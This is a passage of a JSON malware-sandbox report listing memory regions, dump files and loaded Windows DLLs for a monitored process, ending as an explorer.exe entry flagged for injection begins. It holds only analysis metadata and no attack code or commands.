"size": 4096, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1773567, "entry_point": 0, "filename": null, "id": "region_1035", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:00:57.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, 
"size": 1052672, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 5509119, "entry_point": 0, "filename": null, "id": "region_1036", "name": "pagefile_0x0000000000440000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4456448, "timestamp": "00:00:57.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 6291456, "type": "region", "version": 1 }, "end_va": 18874367, "entry_point": 0, "filename": null, "id": "region_1037", "name": "pagefile_0x0000000000600000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6291456, "timestamp": "00:00:57.162", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001038-addr_0x0000000001200000-size_0x0000000000110000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_185", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1114112, "start_va": 18874368, "type": "region", "version": 1 }, "end_va": 19988479, "entry_point": 0, "filename": null, "id": "region_1038", "name": "private_0x0000000001200000", "norm_filename": null, "region_type": "private_memory", "start_va": 18874368, "timestamp": "00:00:57.167", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001039-addr_0x0000000001310000-size_0x0000000000400000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_186", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4194304, "start_va": 19988480, "type": "region", "version": 1 }, 
"end_va": 24182783, "entry_point": 0, "filename": null, "id": "region_1039", "name": "private_0x0000000001310000", "norm_filename": null, "region_type": "private_memory", "start_va": 19988480, "timestamp": "00:00:57.168", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 24182784, "type": "region", "version": 1 }, "end_va": 27127807, "entry_point": 24182784, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1040", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 24182784, "timestamp": "00:00:57.173", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001041-addr_0x0000000000550000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_187", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 6094847, "entry_point": 0, "filename": null, "id": "region_1041", "name": "private_0x0000000000550000", "norm_filename": null, "region_type": "private_memory", "start_va": 5570560, "timestamp": "00:00:57.175", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001042-addr_0x00000000019e0000-size_0x00000000001c0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_188", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1835008, "start_va": 27131904, "type": "region", "version": 1 }, "end_va": 28966911, "entry_point": 0, 
"filename": null, "id": "region_1042", "name": "private_0x00000000019e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 27131904, "timestamp": "00:00:57.177", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 376832, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 4112383, "entry_point": 3735552, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_1043", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 3735552, "timestamp": "00:00:57.181", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1962868736, "type": "region", "version": 1 }, "end_va": 1962917887, "entry_point": 1962868736, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1045", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1962868736, "timestamp": "00:00:57.183", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1945108480, "type": "region", "version": 1 }, "end_va": 1945370623, "entry_point": 1945108480, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_1046", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1945108480, "timestamp": "00:00:57.184", "type": "region", "version": 1 }, { "dump": { "filename": 
"process_00000006-region_00001047-addr_0x00000000019e0000-size_0x0000000000120000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_189", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1179648, "start_va": 27131904, "type": "region", "version": 1 }, "end_va": 28311551, "entry_point": 0, "filename": null, "id": "region_1047", "name": "private_0x00000000019e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 27131904, "timestamp": "00:00:57.185", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001048-addr_0x0000000001b60000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_190", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 28704768, "type": "region", "version": 1 }, "end_va": 28966911, "entry_point": 0, "filename": null, "id": "region_1048", "name": "private_0x0000000001b60000", "norm_filename": null, "region_type": "private_memory", "start_va": 28704768, "timestamp": "00:00:57.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 18874368, "type": "region", "version": 1 }, "end_va": 19787775, "entry_point": 0, "filename": null, "id": "region_1049", "name": "pagefile_0x0000000001200000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 18874368, "timestamp": "00:00:57.190", "type": "region", "version": 1 }, { "dump": { "filename": 
"process_00000006-region_00001050-addr_0x0000000001300000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_191", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 19922944, "type": "region", "version": 1 }, "end_va": 19988479, "entry_point": 0, "filename": null, "id": "region_1050", "name": "private_0x0000000001300000", "norm_filename": null, "region_type": "private_memory", "start_va": 19922944, "timestamp": "00:00:57.191", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001051-addr_0x0000000001ba0000-size_0x0000000000120000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_192", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1179648, "start_va": 28966912, "type": "region", "version": 1 }, "end_va": 30146559, "entry_point": 0, "filename": null, "id": "region_1051", "name": "private_0x0000000001ba0000", "norm_filename": null, "region_type": "private_memory", "start_va": 28966912, "timestamp": "00:00:57.194", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001052-addr_0x0000000000390000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_193", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 3801087, "entry_point": 0, "filename": null, "id": "region_1052", "name": "private_0x0000000000390000", "norm_filename": null, "region_type": "private_memory", "start_va": 3735552, "timestamp": "00:00:57.195", "type": "region", 
"version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 389120, "start_va": 1962934272, "type": "region", "version": 1 }, "end_va": 1963323391, "entry_point": 1962934272, "filename": "\\Windows\\System32\\sxs.dll", "id": "region_1054", "name": "sxs.dll", "norm_filename": "c:\\windows\\system32\\sxs.dll", "region_type": "memory_mapped_file", "start_va": 1962934272, "timestamp": "00:00:57.250", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 30146560, "type": "region", "version": 1 }, "end_va": 34340863, "entry_point": 0, "filename": null, "id": "region_1056", "name": "pagefile_0x0000000001cc0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30146560, "timestamp": "00:00:57.407", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1958150144, "type": "region", "version": 1 }, "end_va": 1958240255, "entry_point": 1958150144, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_1057", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1958150144, "timestamp": "00:00:57.408", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 3801088, "type": 
"region", "version": 1 }, "end_va": 4046847, "entry_point": 3801088, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1058", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 3801088, "timestamp": "00:00:57.409", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1955659776, "type": "region", "version": 1 }, "end_va": 1955901439, "entry_point": 1955659776, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1063", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1955659776, "timestamp": "00:00:57.418", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001064-addr_0x00000000019e0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_195", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 27131904, "type": "region", "version": 1 }, "end_va": 27656191, "entry_point": 27131904, "filename": "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\~DFF8FF715EB6FD8EB1.TMP", "id": "region_1064", "name": "~dff8ff715eb6fd8eb1.tmp", "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\~dff8ff715eb6fd8eb1.tmp", "region_type": "memory_mapped_file", "start_va": 27131904, "timestamp": "00:00:57.429", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001065-addr_0x0000000001ac0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_196", 
"ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 28049408, "type": "region", "version": 1 }, "end_va": 28311551, "entry_point": 0, "filename": null, "id": "region_1065", "name": "private_0x0000000001ac0000", "norm_filename": null, "region_type": "private_memory", "start_va": 28049408, "timestamp": "00:00:57.429", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001066-addr_0x0000000001ba0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_197", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 28966912, "type": "region", "version": 1 }, "end_va": 29491199, "entry_point": 0, "filename": null, "id": "region_1066", "name": "private_0x0000000001ba0000", "norm_filename": null, "region_type": "private_memory", "start_va": 28966912, "timestamp": "00:00:57.432", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001067-addr_0x0000000001cb0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_198", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 30081024, "type": "region", "version": 1 }, "end_va": 30146559, "entry_point": 0, "filename": null, "id": "region_1067", "name": "private_0x0000000001cb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30081024, "timestamp": "00:00:57.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 77824, 
"start_va": 1941766144, "type": "region", "version": 1 }, "end_va": 1941843967, "entry_point": 1941766144, "filename": "\\Windows\\System32\\dwmapi.dll", "id": "region_1068", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\system32\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 1941766144, "timestamp": "00:00:57.435", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1933312000, "type": "region", "version": 1 }, "end_va": 1933426687, "entry_point": 1933312000, "filename": "\\Windows\\System32\\IPHLPAPI.DLL", "id": "region_1069", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\system32\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1933312000, "timestamp": "00:01:06.238", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1997103103, "entry_point": 1997078528, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_1070", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:01:06.238", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1933246464, "type": "region", "version": 1 }, "end_va": 1933275135, "entry_point": 1933246464, "filename": "\\Windows\\System32\\winnsi.dll", "id": "region_1071", "name": "winnsi.dll", "norm_filename": 
"c:\\windows\\system32\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1933246464, "timestamp": "00:01:06.239", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001072-addr_0x00000000003a0000-size_0x0000000000008000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_199", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 32768, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 3833855, "entry_point": 0, "filename": null, "id": "region_1072", "name": "private_0x00000000003a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3801088, "timestamp": "00:01:06.240", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1931804672, "type": "region", "version": 1 }, "end_va": 1931878399, "entry_point": 1931804672, "filename": "\\Windows\\System32\\dhcpcsvc.dll", "id": "region_1073", "name": "dhcpcsvc.dll", "norm_filename": "c:\\windows\\system32\\dhcpcsvc.dll", "region_type": "memory_mapped_file", "start_va": 1931804672, "timestamp": "00:01:06.242", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997340672, "type": "region", "version": 1 }, "end_va": 1997557759, "entry_point": 1997340672, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_1074", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997340672, "timestamp": "00:01:06.242", "type": 
"region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001075-addr_0x00000000020c0000-size_0x0000000000140000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_200", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1310720, "start_va": 34340864, "type": "region", "version": 1 }, "end_va": 35651583, "entry_point": 0, "filename": null, "id": "region_1075", "name": "private_0x00000000020c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 34340864, "timestamp": "00:01:06.243", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001076-addr_0x00000000020c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_201", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 34340864, "type": "region", "version": 1 }, "end_va": 35389439, "entry_point": 0, "filename": null, "id": "region_1076", "name": "private_0x00000000020c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 34340864, "timestamp": "00:01:06.248", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001077-addr_0x00000000021c0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_202", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 35389440, "type": "region", "version": 1 }, "end_va": 35651583, "entry_point": 0, "filename": null, "id": "region_1077", "name": "private_0x00000000021c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35389440, 
"timestamp": "00:01:06.248", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971388416, "type": "region", "version": 1 }, "end_va": 1984274431, "entry_point": 1971388416, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1078", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971388416, "timestamp": "00:01:06.249", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001079-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_203", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_1079", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:01:06.249", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1997668352, "type": "region", "version": 1 }, "end_va": 1998024703, "entry_point": 1997668352, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1080", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1997668352, "timestamp": "00:01:06.250", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], 
"info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 134217728, "start_va": 35651584, "type": "region", "version": 1 }, "end_va": 169869311, "entry_point": 0, "filename": null, "id": "region_1081", "name": "private_0x0000000002200000", "norm_filename": null, "region_type": "private_memory", "start_va": 35651584, "timestamp": "00:01:06.256", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001082-addr_0x0000000000400000-size_0x000000000002a000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_204", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 172032, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4366335, "entry_point": 0, "filename": null, "id": "region_1082", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:01:06.268", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001083-addr_0x000000000a340000-size_0x000000000013d000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_205", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1298432, "start_va": 171180032, "type": "region", "version": 1 }, "end_va": 172478463, "entry_point": 0, "filename": null, "id": "region_1083", "name": "private_0x000000000a340000", "norm_filename": null, "region_type": "private_memory", "start_va": 171180032, "timestamp": "00:01:06.616", "type": "region", "version": 1 }, { "dump": { "filename": 
"process_00000006-region_00001084-addr_0x000000000a480000-size_0x000000000027b000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_206", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2600960, "start_va": 172490752, "type": "region", "version": 1 }, "end_va": 175091711, "entry_point": 0, "filename": null, "id": "region_1084", "name": "private_0x000000000a480000", "norm_filename": null, "region_type": "private_memory", "start_va": 172490752, "timestamp": "00:01:06.616", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001085-addr_0x00000000003b0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_207", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 0, "filename": null, "id": "region_1085", "name": "private_0x00000000003b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3866624, "timestamp": "00:01:06.635", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 172032, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 4038655, "entry_point": 0, "filename": null, "id": "region_1086", "name": "pagefile_0x00000000003b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3866624, "timestamp": "00:01:06.684", "type": "region", "version": 1 }, { "dump": { "filename": 
"process_00000006-region_00001087-addr_0x00000000003e0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_208", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4128767, "entry_point": 0, "filename": null, "id": "region_1087", "name": "private_0x00000000003e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4063232, "timestamp": "00:01:06.687", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1441792, "start_va": 169869312, "type": "region", "version": 1 }, "end_va": 171311103, "entry_point": 0, "filename": null, "id": "region_1088", "name": "pagefile_0x000000000a200000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 169869312, "timestamp": "00:01:06.699", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4116479, "entry_point": 0, "filename": null, "id": "region_1461", "name": "pagefile_0x00000000003e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4063232, "timestamp": "00:01:10.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", 
"permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 172032, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 5742591, "entry_point": 0, "filename": null, "id": "region_1462", "name": "pagefile_0x0000000000550000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5570560, "timestamp": "00:01:10.503", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001463-addr_0x0000000000590000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_218", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 5832704, "type": "region", "version": 1 }, "end_va": 6094847, "entry_point": 0, "filename": null, "id": "region_1463", "name": "private_0x0000000000590000", "norm_filename": null, "region_type": "private_memory", "start_va": 5832704, "timestamp": "00:01:10.503", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "C:\\Windows\\Explorer.EXE", "filename": "c:\\windows\\explorer.exe", "id": "proc_7", "image_name": "explorer.exe", "monitor_reason": "injection", "monitored_id": 7, "origin_monitor_id": 6, "ref_parent_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1089", "name": "pagefile_0x0000000000010000", 
"norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:06.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 139263, "entry_point": 0, "filename": null, "id": "region_1090", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:06.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1091", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:06.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 270335, "entry_point": 0, "filename": null, "id": "region_1092", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:06.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 
